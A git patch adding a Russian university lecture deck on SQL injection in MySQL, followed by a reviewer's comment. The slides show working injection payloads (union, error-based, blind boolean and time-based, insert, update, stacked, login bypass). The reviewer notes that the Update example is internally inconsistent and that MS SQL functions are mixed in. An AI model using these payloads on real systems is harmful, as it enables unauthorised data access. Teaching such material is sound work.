From c786e903ea549020bf1452ab11ff9be8730a1e60 Mon Sep 17 00:00:00 2001 
From: Andrew Guschin Date: Tue, 13 Jun 2023 11:32:06 +0400 Subject: =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB=D0=B5=D0=BD=D0=B0?= =?UTF-8?q?=20=D0=BB=D0=B5=D0=BA=D1=86=D0=B8=D1=8F=20=D0=BF=D0=BE=20=D0=B7?= =?UTF-8?q?=D0=B0=D1=89=D0=B8=D1=89=D1=91=D0=BD=D0=BD=D1=8B=D0=BC=20=D0=B1?= =?UTF-8?q?=D0=B0=D0=B7=D0=B0=D0=BC=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- opzbd-lecture/presentation/images/databases.png | Bin 0 -> 31360 bytes opzbd-lecture/presentation/images/metadata_1.png | Bin 0 -> 50639 bytes opzbd-lecture/presentation/images/metadata_10.png | Bin 0 -> 36358 bytes opzbd-lecture/presentation/images/metadata_11.png | Bin 0 -> 31505 bytes opzbd-lecture/presentation/images/metadata_2.png | Bin 0 -> 16780 bytes opzbd-lecture/presentation/images/metadata_3.png | Bin 0 -> 14730 bytes opzbd-lecture/presentation/images/metadata_5.png | Bin 0 -> 31395 bytes opzbd-lecture/presentation/images/metadata_7.png | Bin 0 -> 19764 bytes opzbd-lecture/presentation/images/metadata_8.png | Bin 0 -> 17769 bytes opzbd-lecture/presentation/images/metadata_9.png | Bin 0 -> 14342 bytes opzbd-lecture/presentation/images/sql_joke.png | Bin 0 -> 31577 bytes opzbd-lecture/presentation/images/tables.png | Bin 0 -> 184907 bytes opzbd-lecture/presentation/images/users.png | Bin 0 -> 50113 bytes opzbd-lecture/presentation/presentation.pdf | Bin 0 -> 825799 bytes opzbd-lecture/presentation/presentation.tex | 315 ++++++++++++++++++++++ 15 files changed, 315 insertions(+) create mode 100644 opzbd-lecture/presentation/images/databases.png create mode 100644 opzbd-lecture/presentation/images/metadata_1.png create mode 100644 opzbd-lecture/presentation/images/metadata_10.png create mode 100644 opzbd-lecture/presentation/images/metadata_11.png create mode 100644 opzbd-lecture/presentation/images/metadata_2.png create mode 100644 opzbd-lecture/presentation/images/metadata_3.png create mode 100644 
opzbd-lecture/presentation/images/metadata_5.png create mode 100644 opzbd-lecture/presentation/images/metadata_7.png create mode 100644 opzbd-lecture/presentation/images/metadata_8.png create mode 100644 opzbd-lecture/presentation/images/metadata_9.png create mode 100644 opzbd-lecture/presentation/images/sql_joke.png create mode 100644 opzbd-lecture/presentation/images/tables.png create mode 100644 opzbd-lecture/presentation/images/users.png create mode 100644 opzbd-lecture/presentation/presentation.pdf create mode 100644 opzbd-lecture/presentation/presentation.tex (limited to 'opzbd-lecture/presentation')
diff --git a/opzbd-lecture/presentation/images/databases.png b/opzbd-lecture/presentation/images/databases.png
new file mode 100644
index 0000000..6171aba
Binary files /dev/null and b/opzbd-lecture/presentation/images/databases.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_1.png b/opzbd-lecture/presentation/images/metadata_1.png
new file mode 100644
index 0000000..26a422d
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_1.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_10.png b/opzbd-lecture/presentation/images/metadata_10.png
new file mode 100644
index 0000000..09045ad
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_10.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_11.png b/opzbd-lecture/presentation/images/metadata_11.png
new file mode 100644
index 0000000..3c5850d
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_11.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_2.png b/opzbd-lecture/presentation/images/metadata_2.png
new file mode 100644
index 0000000..95d0a0c
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_2.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_3.png b/opzbd-lecture/presentation/images/metadata_3.png
new file mode 100644
index 0000000..33061f6
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_3.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_5.png b/opzbd-lecture/presentation/images/metadata_5.png
new file mode 100644
index 0000000..7cd2561
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_5.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_7.png b/opzbd-lecture/presentation/images/metadata_7.png
new file mode 100644
index 0000000..ade6167
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_7.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_8.png b/opzbd-lecture/presentation/images/metadata_8.png
new file mode 100644
index 0000000..07b953d
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_8.png differ
diff --git a/opzbd-lecture/presentation/images/metadata_9.png b/opzbd-lecture/presentation/images/metadata_9.png
new file mode 100644
index 0000000..430a5ae
Binary files /dev/null and b/opzbd-lecture/presentation/images/metadata_9.png differ
diff --git a/opzbd-lecture/presentation/images/sql_joke.png b/opzbd-lecture/presentation/images/sql_joke.png
new file mode 100644
index 0000000..7e0a7a4
Binary files /dev/null and b/opzbd-lecture/presentation/images/sql_joke.png differ
diff --git a/opzbd-lecture/presentation/images/tables.png b/opzbd-lecture/presentation/images/tables.png
new file mode 100644
index 0000000..075a3b3
Binary files /dev/null and b/opzbd-lecture/presentation/images/tables.png differ
diff --git a/opzbd-lecture/presentation/images/users.png b/opzbd-lecture/presentation/images/users.png
new file mode 100644
index 0000000..5337bbd
Binary files /dev/null and b/opzbd-lecture/presentation/images/users.png differ
diff --git a/opzbd-lecture/presentation/presentation.pdf b/opzbd-lecture/presentation/presentation.pdf
new file mode 100644
index 0000000..245942f
Binary files /dev/null and b/opzbd-lecture/presentation/presentation.pdf differ
diff --git a/opzbd-lecture/presentation/presentation.tex b/opzbd-lecture/presentation/presentation.tex
new file mode 100644
index 0000000..6cad20f
--- /dev/null
+++ b/opzbd-lecture/presentation/presentation.tex
@@ -0,0 +1,315 @@
+\documentclass{beamer}
+
+\usepackage[T2A]{fontenc}
+\usepackage[utf8]{inputenc}
+\usepackage[english,russian]{babel}
+\usepackage{wrapfig}
+\usepackage{graphicx}
+\usepackage{multirow}
+\usepackage{fancyvrb}
+\usepackage{underscore}
+\graphicspath{ {./images/} }
+
+\usetheme{Madrid}
+
+\title{SQL инъекция в сервере MySQL}
+\author[Андрей, Роман, Иван, Ирина]{Андрей~Гущин \and Роман~Стаин \and Иван~Улитин \and Ирина~Зимина}
+\institute[СГУ]{Саратовский Государственный Университет}
+\date{6 марта 2023 г.}
+
+\begin{document}
+
+\maketitle
+
+\begin{frame}{Анализ БД через SQL инъекцию}
+ \begin{minipage}[t]{0.48\linewidth}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{databases}
+ \end{figure}
+ \end{minipage}
+ \hfill
+ \begin{minipage}[t]{0.48\linewidth}
+ \begin{figure}[H]
+ \includegraphics[width=0.7\textwidth]{tables}
+ \end{figure}
+ \end{minipage}
+\end{frame}
+
+\begin{frame}{Анализ БД через SQL инъекцию}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{users}
+ \end{figure}
+\end{frame}
+
+
+\begin{frame}{Функция SERVERPROPERTY}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_1}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функция DATABASEPROPERTYEX}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_2}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функции DB_NAME и DB_ID}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_3}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функции FILE_NAME, FILE_ID и FILE_IDEX}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_5}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функции SCHEMA_NAME и SCHEMA_ID}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_7}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функции SCHEMA_NAME и SCHEMA_ID}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_8}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функции OBJECT_NAME и OBJECT_ID}
+ \begin{figure}[H]
+ \includegraphics[width=\textwidth]{metadata_9}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функция STATS_DATE}
+ \begin{figure}[H]
+ \includegraphics[width=0.8\textwidth]{metadata_10}
+ \end{figure}
+\end{frame}
+\begin{frame}{Функция STATS_DATE}
+ \begin{figure}[H]
+ \includegraphics[width=0.85\textwidth]{metadata_11}
+ \end{figure}
+\end{frame}
+
+
+\begin{frame}[fragile]{Типы SQL запросов -- Union-based}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+SELECT name,email FROM users WHERE id='';
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+1' UNION SELECT password,secret FROM users --
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+SELECT name,email FROM users WHERE id='1'
+UNION
+SELECT password,secret FROM users -- ';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Error-based}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+SELECT name,email FROM users
+ WHERE id='1' and
+ ExtractValue(rand(),concat(0x3a,version()))
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Boolean-based}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+SELECT email FROM users WHERE id='';
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+1' and password LIKE 'a%
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+SELECT email FROM users WHERE id='1' and password LIKE 'a%';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Time-based}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+SELECT login FROM users WHERE id='';
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+1' AND IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+SELECT login FROM users
+ WHERE id='1' AND
+ IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Insert}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+INSERT INTO users(email,login,password)
+ VALUES('','','');
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+test1','1234'),('my@email.com',VERSION(),'1337')
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+INSERT INTO users(email,login,password)
+ VALUES('...','test1','1234'),
+ ('my@email.com',VERSION(),'1337')
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Update}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+UPDATE users SET about='about' WHERE id='1';
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+', email=VERSION() WHERE id='1'
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+UPDATE users SET about='', email=VERSION()
+ WHERE id='1' -- ' WHERE id='1';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Типы SQL запросов -- Stacked}
+ \begin{block}{Запрос}
+ \begin{Verbatim}
+SELECT login FROM users WHERE id='';
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Инъекция}
+ \begin{Verbatim}
+1'; SELECT password FROM users WHERE id='1
+ \end{Verbatim}
+ \end{block}
+ \pause
+ \begin{block}{Запрос с инъекцией}
+ \begin{Verbatim}
+SELECT login FROM users WHERE id='1';
+SELECT password FROM users WHERE id='1';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+
+\begin{frame}[fragile]{Инъекция в сложных запросах}
+ На практике в конце SQL-запроса могут быть дополнительные условия, операторы
+ сортировки, группировки и другие SQL-конструкции. В каждом конкретном случае,
+ злоумышленник постарается встроить вредоносный кусок таким образом, чтобы
+ запрос в целом остался синтаксически корректным, но выболнял другую функцию.
+
+ \begin{block}{Уязвимый запрос с дополнительным условием}
+ \begin{Verbatim}
+$sql = "SELECT username, realname
+ FROM users WHERE cityid='"
+ . $_GET['cityid'] . "' AND age<'35'";
+ \end{Verbatim}
+ \end{block}
+
+ \begin{block}{Итоговый запрос}
+ \begin{Verbatim}
+SELECT username, realname FROM users WHERE cityid='20'
+UNION SELECT username, password AS realname FROM
+users WHERE 1 OR '1' AND age<'35';
+ \end{Verbatim}
+ \end{block}
+\end{frame}
+
+\begin{frame}[fragile]{Результаты запроса не отображаются пользователю}
+ Может оказаться, что уязвимым является запрос, результаты которого не
+ отображаются пользователю.
+
+ \begin{block}{Пример 1}
+ \begin{Verbatim}
+$sql = "SELECT count(*) FROM users
+ WHERE userid='" . $_GET['userid'] . "'";
+ \end{Verbatim}
+ \end{block}
+
+ \begin{block}{Пример 2}
+ \begin{Verbatim}
+SELECT count(*) FROM users
+WHERE userid='2' AND password LIKE 'a%';
+ \end{Verbatim}
+ \end{block}
+
+ Взломщик получит "пользователь не найден", если пароль не начинается на букву
+ 'a', или стандартную страницу с профилем пользователя, в противном случае.
+ Перебором определяется первая буква пароля, затем вторая и.т.д.
+
+\end{frame}
+
+\begin{frame}[fragile]{Login Bypass Authentication}
+Это может быть использовано для того, чтобы заставить веб-сервер или любой
+другой интерфейс между пользователем и базой данных выполнить указания, которые
+необходимы взломщику.
+
+\begin{block}{Пример 1}
+ \begin{Verbatim}
+SELECT id
+FROM users
+WHERE login='' AND password='';
+ \end{Verbatim}
+\end{block}
+
+\begin{block}{Пример 2}
+ \begin{Verbatim}
+SELECT id FROM users
+WHERE login='1234\' AND password='UNION SELECT 1 -- ';
+ \end{Verbatim}
+\end{block}
+\end{frame}
+
+\begin{frame}{Внимание! Анекдот.}
+ \begin{figure}[H]
+ \includegraphics[width=0.8\textwidth]{sql_joke}
+ \end{figure}
+\end{frame}
+
+\begin{frame}
+ \frametitle{Внимание!}
+
+ \begin{center}
+ {\Huge Спасибо за внимание!} \\
+ {\footnotesize Колоться "--- это незаконно и неэтично.}
+ \end{center}
+\end{frame}
+
+\end{document}
-- cgit v1.2.3
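Review bot: The metadata-function frames (SERVERPROPERTY, DATABASEPROPERTYEX, DB_NAME/DB_ID, FILE_NAME/FILE_ID/FILE_IDEX, SCHEMA_NAME/SCHEMA_ID, OBJECT_NAME/OBJECT_ID, STATS_DATE) describe Microsoft SQL Server built-ins, while `\title{SQL инъекция в сервере MySQL}` and the later Verbatim examples (ExtractValue, SLEEP, VERSION()) are MySQL-specific, so either the title or those frame titles should name the DBMS they apply to, e.g. `\begin{frame}{Функция SERVERPROPERTY (MS SQL Server)}`. In the "Инъекция в сложных запросах" frame, `выболнял` should read `выполнял`. On the Update frame the "Инъекция" and "Запрос с инъекцией" blocks do not agree with each other (the final query ends in `-- ' WHERE id='1';`, which the quoted fragment does not produce), so one of the two blocks needs correcting. The deck also ends without a mitigation frame; a short closing frame on prepared statements/parameterised queries, server-side input validation and least-privilege database accounts would give the audience the defensive counterpart to the examples shown.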